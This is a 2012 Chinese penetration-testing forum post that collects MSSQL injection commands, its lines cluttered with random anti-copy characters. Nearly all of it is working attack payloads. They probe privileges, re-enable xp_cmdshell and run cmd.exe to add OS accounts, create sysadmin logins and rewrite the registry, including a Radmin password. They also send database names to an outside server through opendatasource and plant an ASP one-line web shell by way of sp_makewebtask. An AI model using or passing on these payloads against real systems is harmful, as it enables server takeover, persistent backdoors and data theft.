中国网络渗透测试联盟

标题: 常用的一些注入命令 [打印本页]
作者: admin    时间: 2012-9-15 14:40
标题: 常用的一些注入命令
//看看是什么权限的
' N2 c2 {5 U" O) U# t' hand 1=(Select IS_MEMBER('db_owner'))
6 a6 M& Q5 F: z1 ~* a* \# AAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--7 z" `6 V. P6 x4 h  n% @

" d1 C" y1 }3 y6 I4 d//检测是否有读取某数据库的权限. F2 d5 V1 F) J: Y
and 1= (Select HAS_DBACCESS('master'))
5 `4 P" b4 t; NAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
! u) |0 f% m  K/ I' q( b" P/ b8 C: P- M, z3 o" T9 ?# V( ^0 ?) i
. R) r- S1 m9 N7 X' |, }
数字类型
% p1 D% O% u8 Oand char(124)%2Buser%2Bchar(124)=0
) }  A: Y# g1 t& [+ r# w; r' |$ x* X* z# s' O+ x
字符类型
: S  y/ J7 u, c# z8 ^' U3 k% F' and char(124)%2Buser%2Bchar(124)=0 and ''='
! G1 I5 F3 u3 \: J/ V; h
" u- O6 W& ^; t; r. {6 T6 \搜索类型
# |- D; P0 j& m% S0 c' and char(124)%2Buser%2Bchar(124)=0 and '%'='2 s1 v' Z' `7 ~+ p/ j0 I! {
* a* p7 z% P5 H; Z. r0 h
爆用户名- F8 X9 Q! d" Q( o& R
and user>0. t: z/ \$ }5 ^- l. f- y; L
' and user>0 and ''='
, Z" c" X0 }2 K9 r( N6 {* n( U
3 w& X( U+ |* g. X  }检测是否为SA权限
- O( i# x9 b5 t2 z6 ?! ]and 1=(select IS_SRVROLEMEMBER('sysadmin'));--0 f0 m* t1 K7 o$ a, p
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
: X. y! h* H: e, \/ w& K4 F+ h; ^* o+ U% L( `! F, g
检测是不是MSSQL数据库
! A6 V  o7 Y7 U) ^0 |( G: Mand exists (select * from sysobjects);--2 t$ p, K3 G4 D0 q1 x
1 z, V. m# V$ O% Y
检测是否支持多行
) X' J+ U4 m" e7 I;declare @d int;--' t# M4 Y# m. _6 E
" t. C; k. Z% v( R
恢复 xp_cmdshell! i: L- N( G) ~$ [6 e6 L6 d
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--8 h/ m) |5 k( x. A
# I" i3 N# r% }5 z- b1 Z

! v3 _# ?' P5 J$ O6 ^5 _select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')4 Q$ e$ g- m7 x% `( B6 m

! u& `+ k! z5 g2 \0 W3 Q8 N* ~7 J//-----------------------
& `3 [+ g- X7 Y( K" j//       执行命令8 P$ N( p* W1 d% J9 T1 T$ D. w( N
//-----------------------6 E2 w2 R6 t7 t; I1 }9 S; N
首先开启沙盘模式:7 d" b& r4 j& y
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1( T1 l  _. I% W

1 o3 S0 w6 G3 a8 A然后利用jet.oledb执行系统命令2 Y1 o7 E2 g) U4 E4 f
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
/ v# x6 c" W2 @) B& e
% ~: ]1 o6 W9 b2 `执行命令1 ]6 u2 ~; m/ n& O: y6 [
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--+ j: Y3 Z) {  b( r2 _

! \" I9 B$ `8 v3 h( W0 s' TEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
  N+ M* X. b  h& ?  p$ C9 e/ H: L( c9 g) u* E
判断xp_cmdshell扩展存储过程是否存在:
8 l( T. Y0 E3 p2 thttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')# `+ J3 q5 G$ c; }- \

, S3 b# K" t6 s写注册表; N8 t5 h9 a4 Z. E; a5 a4 f
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
  B6 \, s" j; o9 W9 A' M; T* i' c9 z% Q8 J' i# R
REG_SZ6 v' d- \3 E! c8 g* z/ f

5 u. V  a0 Y! k' u& k, `5 A. ?7 |! X3 `读注册表9 L8 ~: t1 k5 u& _
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'1 h" t% M- c) [, U( A" L

& N+ D; p' g% l! D. i$ A3 C读取目录内容
0 R9 f$ T6 f* J6 Y1 D4 H& Oexec master..xp_dirtree 'c:\winnt\system32\',1,1
9 S  _& q6 W' j1 t+ [4 K
6 C' w+ V/ v( W$ L: p: z- o" |
7 I: S' w) k  j: e数据库备份
, Y) v* l7 \5 F  V4 }$ Cbackup database pubs to disk = 'c:\123.bak'
* D) {; t5 s! w, @5 q7 |! z. o  T3 ]+ M1 X9 U
//爆出长度
2 }/ n% d' y2 o# v. l8 s7 sAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
4 E* Q9 a2 z" c* M' i5 j8 `. R  H, e' K
( r, N" t$ ^! [7 h1 u$ N# c
5 \6 T3 A/ u3 j( P$ @- b1 x: |1 g" ]( O# @- B+ e$ x
更改sa口令方法:用sql综合利用工具连接后,执行命令:) }) u+ H! p, i5 B
exec sp_password NULL,'新密码','sa'+ a3 t$ C" f% g

4 `, E3 l$ k# q添加和删除一个SA权限的用户test:
0 x& s9 j% c, u/ ]- m4 `exec master.dbo.sp_addlogin test,9530772: e8 D+ n& t0 s8 P& @
exec master.dbo.sp_addsrvrolemember test,sysadmin4 ?6 K2 F! Q! L8 F

; F8 u9 Z, j# b' N) m# p/ \! m. s删除扩展存储过过程xp_cmdshell的语句:+ D! G* Y8 V$ ^0 k
exec sp_dropextendedproc 'xp_cmdshell'
2 A) f* C6 Q! L! s* c$ v, G0 v9 d4 C0 y
添加扩展存储过过程
, a5 ^7 V# m. K! LEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'6 @; a& \: T9 c; f/ c
GRANT exec On xp_proxiedadata TO public
( l! a# _( s  f: X: O7 J  E2 \' E. j/ \7 ~6 c4 T& E% {1 H
0 `, c1 L' y- P: u6 c, K2 M9 j; f
停掉或激活某个服务。0 Q/ W6 d9 J6 m- v

+ e; i' o7 d6 n8 Vexec master..xp_servicecontrol 'stop','schedule'2 c  m, D1 ]) H/ |5 v, Q7 f
exec master..xp_servicecontrol 'start','schedule'
/ I0 q- [, [& l% \7 \9 r8 |: }1 K5 |9 a, b
dbo.xp_subdirs
0 ^% P8 x3 T1 j$ S0 Y2 A/ n6 z8 e/ H& |, _6 ~
只列某个目录下的子目录。
: x/ g; t' V  Y" g% B5 k( qxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'  \7 |1 U$ v0 H
* p! q6 t1 M: ]* M  |
dbo.xp_makecab
- V% p' ~9 m; r; P# @: L* ]" l5 E  E/ |/ K/ j7 `0 a; R
将目标多个档案压缩到某个目标档案之内。% _8 r/ O9 I3 |& e
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
1 H# S8 D% ?1 n4 @7 T# ~
" B6 c1 ?6 H, y2 Y0 @dbo.xp_makecab
' E: F5 ^3 K  ~'c:\test.cab','mszip',1,
1 Q- M1 j* Y) j: [7 M0 g5 ~'C:\Inetpub\wwwroot\SQLInject\login.asp',9 n" J! G( g: n, j$ t
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'% E6 F+ s* E0 H) a# k4 w2 F, E, ]9 M

$ r5 `: I! l3 ]: R3 H; n+ @; [/ i" Dxp_terminate_process2 [/ S: }9 F4 g& W" s
  m: J3 B/ L! j  o1 U7 X! _
停掉某个执行中的程序,但赋予的参数是 Process ID。- ^" T8 u5 }" [  K: K8 o
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
* h8 C7 w" Q" R" Q7 n* I: L6 Y, w/ g
xp_terminate_process 2484
- {6 a* B9 N5 L9 g% ~  S& N% d2 m% r* W4 K! _3 \1 ~7 }
xp_unpackcab" V1 r8 P8 d  c$ m

' k) q$ t; O0 n  g0 x/ ~: [% V解开压缩档。7 K( B6 K7 n  N

4 x' `8 r- j! s! F! Pxp_unpackcab 'c:\test.cab','c:\temp',1
# J( f  j1 u$ L0 o$ j$ a, v, T% H, G  C' }

$ p/ u7 c- G! p" k4 K+ Y! k某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
2 L6 U* W2 |3 P8 k9 U' P1 Y7 m) x9 A. t! w& p* p  w% \4 j2 G; l3 _0 ~
create database lcx;* ~$ l% s& g1 G# m
Create TABLE ku(name nvarchar(256) null);
% ]) }8 {( `5 z0 dCreate TABLE biao(id int NULL,name nvarchar(256) null);
* m( f3 [" H. o& d1 E* X7 u) T
; H5 }, S' P7 N7 U5 W5 q//得到数据库名
9 _3 w& }$ G# A& Z& oinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases. I9 \7 P4 G0 u! o. ]; N
" j7 V) ^6 E; N- D5 @9 `
! O$ a2 o/ y3 ]' o% t
//在Master中创建表,看看权限怎样
) U7 R" Z9 k8 }; xCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--4 x! e0 X( I' A& e" S* Z# Z
& V) U) e5 @  o9 T7 ?0 O& B
用 sp_makewebtask直接在web目录里写入一句话马:8 o* E, h; u% v+ u6 L
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--0 t" ?3 U6 T: h6 I; }
( d: T( f/ s3 ^5 v* ]
//更新表内容
: y# n6 }4 S, ], v2 [% iUpdate films SET kind = 'Dramatic' Where id = 1231 O- X8 B. @% H4 \( ~4 N' ]
3 \8 [4 t' U2 l$ l& F6 D
//删除内容7 O5 P/ @2 N( e, ]; z$ m/ t; s
delete from table_name where Stockid = 3



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2